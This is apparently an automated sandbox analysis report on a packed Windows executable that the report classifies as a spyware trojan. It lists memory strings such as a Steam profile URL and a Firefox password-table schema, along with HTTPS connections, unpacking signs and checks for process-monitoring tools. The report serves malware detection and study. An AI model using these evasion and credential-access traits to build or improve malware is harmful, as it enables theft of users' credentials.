                Source: YKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309668421.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2287405344.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001532000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001532000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.000000000152B000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: YKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309668421.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2287405344.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49736 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: YKri2nEBWE.exeStatic PE information: section name:
                Source: YKri2nEBWE.exeStatic PE information: section name: .rsrc
                Source: YKri2nEBWE.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_3_015A39D80_3_015A39D8
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_3_05DE6A560_3_05DE6A56
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C804600_2_00C80460
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C7C5A00_2_00C7C5A0
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C4E6870_2_00C4E687
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C486000_2_00C48600
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C80D200_2_00C80D20
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C78EA00_2_00C78EA0
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C4CE450_2_00C4CE45
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C4B1000_2_00C4B100
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C792800_2_00C79280
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C512270_2_00C51227
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C6D34A0_2_00C6D34A
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C674400_2_00C67440
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C4F60D0_2_00C4F60D
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C557C00_2_00C557C0
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C61D000_2_00C61D00
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CD80CE0_2_00CD80CE
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C6A0CA0_2_00C6A0CA
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CDA0C10_2_00CDA0C1
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CBE0D50_2_00CBE0D5
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00DBC0C50_2_00DBC0C5
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C6C0E60_2_00C6C0E6
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D9A0FB0_2_00D9A0FB
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00DAC0FE0_2_00DAC0FE
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C560E90_2_00C560E9
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CD00FC0_2_00CD00FC
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D3C0EF0_2_00D3C0EF
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C6C09E0_2_00C6C09E
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D360B20_2_00D360B2
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CDC0AF0_2_00CDC0AF
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D760BB0_2_00D760BB
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CCE0BF0_2_00CCE0BF
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00DA00AF0_2_00DA00AF
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D2E05D0_2_00D2E05D
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CDE05F0_2_00CDE05F
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D9C04C0_2_00D9C04C
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00DD00770_2_00DD0077
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CBC0780_2_00CBC078
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CC40790_2_00CC4079
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00DC40600_2_00DC4060
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CEA0180_2_00CEA018
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D0A00D0_2_00D0A00D
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00DB00060_2_00DB0006
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D9E0070_2_00D9E007
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D6C03E0_2_00D6C03E
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D740240_2_00D74024
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D620220_2_00D62022
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D060280_2_00D06028
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00DA21DC0_2_00DA21DC
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C681CC0_2_00C681CC
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CC81C00_2_00CC81C0
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CD61D40_2_00CD61D4
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00CF81E40_2_00CF81E4
                Source: YKri2nEBWE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: YKri2nEBWE.exeStatic PE information: Section: ZLIB complexity 0.9995021446078431
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C72070 CoCreateInstance,0_2_00C72070
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: YKri2nEBWE.exe, 00000000.00000003.2178127622.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177609713.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2227059079.0000000005E82000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2226640957.0000000005DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: YKri2nEBWE.exeVirustotal: Detection: 56%
                Source: YKri2nEBWE.exeReversingLabs: Detection: 63%
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile read: C:\Users\user\Desktop\YKri2nEBWE.exeJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: YKri2nEBWE.exeStatic file information: File size 2920448 > 1048576
                Source: YKri2nEBWE.exeStatic PE information: Raw size of awkvfzgs is bigger than: 0x100000 < 0x29f200

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeUnpacked PE file: 0.2.YKri2nEBWE.exe.c40000.0.unpack :EW;.rsrc :W;.idata :W;awkvfzgs:EW;nvoqryrp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;awkvfzgs:EW;nvoqryrp:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: YKri2nEBWE.exeStatic PE information: real checksum: 0x2d7472 should be: 0x2cf054
                Source: YKri2nEBWE.exeStatic PE information: section name:
                Source: YKri2nEBWE.exeStatic PE information: section name: .rsrc
                Source: YKri2nEBWE.exeStatic PE information: section name: .idata
                Source: YKri2nEBWE.exeStatic PE information: section name: awkvfzgs
                Source: YKri2nEBWE.exeStatic PE information: section name: nvoqryrp
                Source: YKri2nEBWE.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_3_015A4F55 push esi; retf 0_3_015A4F58
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_3_015A4AD7 push FFFFFFDBh; iretd 0_3_015A4AE8
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_3_05DE61C0 push 00000030h; retf 0_3_05DE61C2
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C99840 push ebx; mov dword ptr [esp], 1F57A021h0_2_00C9A518
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C99840 push edx; mov dword ptr [esp], ebx0_2_00C9A531
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C9C0D1 push edi; mov dword ptr [esp], ebx0_2_00C9C0D2
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00ED40DF push 6C9912C0h; mov dword ptr [esp], edi0_2_00ED4102
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00E940D2 push esi; mov dword ptr [esp], ecx0_2_00E9410E
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00E940D2 push edi; mov dword ptr [esp], edx0_2_00E94126
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00E940D2 push edi; mov dword ptr [esp], ecx0_2_00E941E8
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D360B2 push 4B87F0F3h; mov dword ptr [esp], esi0_2_00D36390
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D360B2 push eax; mov dword ptr [esp], ebx0_2_00D36401
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D360B2 push esi; mov dword ptr [esp], 44865D87h0_2_00D36430
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D360B2 push ebp; mov dword ptr [esp], eax0_2_00D364D2
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D360B2 push ecx; mov dword ptr [esp], ebp0_2_00D36521
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D360B2 push esi; mov dword ptr [esp], ebx0_2_00D3652F
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D360B2 push 71B4DE71h; mov dword ptr [esp], ebp0_2_00D365DD
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00D360B2 push ecx; mov dword ptr [esp], esp0_2_00D365E1
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C9A0AC push edi; mov dword ptr [esp], eax0_2_00C9A866
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C9C048 push edi; mov dword ptr [esp], edx0_2_00C9C051
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C9C048 push 41087BD1h; mov dword ptr [esp], ecx0_2_00C9C075
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C9C009 push ebp; mov dword ptr [esp], edx0_2_00C9C5C3
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C9C009 push 3971463Dh; mov dword ptr [esp], edi0_2_00C9E1D5
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C9C009 push ebp; mov dword ptr [esp], 33E7A24Dh0_2_00C9E3DD
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C9C021 push 7D383EF2h; mov dword ptr [esp], esi0_2_00C9CA90
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C9C021 push 3AA08D2Fh; mov dword ptr [esp], ebp0_2_00C9CAB7
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C9C1CA push ebx; mov dword ptr [esp], 773DBF61h0_2_00CA08D9
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C9A1DA push edi; mov dword ptr [esp], 1933D389h0_2_00C9A1E9
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C9C1D6 push eax; mov dword ptr [esp], ecx0_2_00C9C1D8
                Source: YKri2nEBWE.exeStatic PE information: section name: entropy: 7.9818005594578265

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
